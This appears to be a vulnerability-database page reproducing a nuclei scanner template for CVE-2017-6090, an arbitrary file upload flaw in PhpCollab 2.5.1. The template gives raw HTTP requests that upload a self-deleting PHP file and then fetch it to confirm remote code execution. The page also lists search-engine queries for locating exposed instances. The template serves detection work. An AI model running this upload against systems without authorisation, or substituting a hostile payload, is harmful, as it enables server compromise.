PhpColl 2.5.1 Arbitrary File Upload

10 Jun 2026 05:11:04 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com | 18 views

The PhpCollab 2.5.1 arbitrary file upload vulnerability allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | PhpCollab 2.5.1 Shell Upload Exploit | 30 Sep 2017 00:00 | zdt |
| 0day.today | phpCollab 2.5.1 - Unauthenticated File Upload Exploit | 11 Jan 2018 00:00 | zdt |
| Circl | CVE-2017-6090 | 2 Oct 2017 00:00 | circl |
| CNVD | PhpCollab Arbitrary Code Execution Vulnerability | 21 May 2018 00:00 | cnvd |
| CVE | CVE-2017-6090 | 2 Oct 2017 17:00 | cve |
| Cvelist | CVE-2017-6090 | 2 Oct 2017 17:00 | cvelist |
| Exploit DB | phpCollab 2.5.1 - Arbitrary File Upload | 2 Oct 2017 00:00 | exploitdb |
| Exploit DB | phpCollab 2.5.1 - File Upload (Metasploit) | 11 Jan 2018 00:00 | exploitdb |
| exploitpack | phpCollab 2.5.1 - Arbitrary File Upload | 2 Oct 2017 00:00 | exploitpack |
| Metasploit | phpCollab 2.5.1 Unauthenticated File Upload | 20 Dec 2017 13:36 | metasploit |

id: CVE-2017-6090

info:
  name: PhpColl 2.5.1 Arbitrary File Upload
  author: pikpikcu
  severity: high
  description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
  reference:
    - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-6090
    - https://www.exploit-db.com/exploits/42934/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-6090
    cwe-id: CWE-434
    epss-score: 0.86913
    epss-percentile: 0.9945
    cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpcollab
    product: phpcollab
    shodan-query:
      - http.title:"PhpCollab"
      - http.title:"phpcollab"
    fofa-query: title="phpcollab"
    google-query: intitle:"phpcollab"
  tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev,vuln
variables:
  string: "CVE-2017-6090"

http:
  - raw:
      - |
        POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137

        -----------------------------154934846911423734231554128137
        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        -----------------------------154934846911423734231554128137--
      - |
        GET /logos_clients/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        status:
          - 200
# digest: 490a00463044022054deeb61b42d292b801cb6444a98f4ec3c9dd554ec4c0a109b84b5ae2a36c021022070e5f90fe13a6c37416300aec204ba9f041404650e093610a02dd109b5a18b06:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (Current)
Vulners AI Score: 8.1 (High risk)
CVSS 2: 6.5
CVSS 3: 8.8
EPSS: 0.86913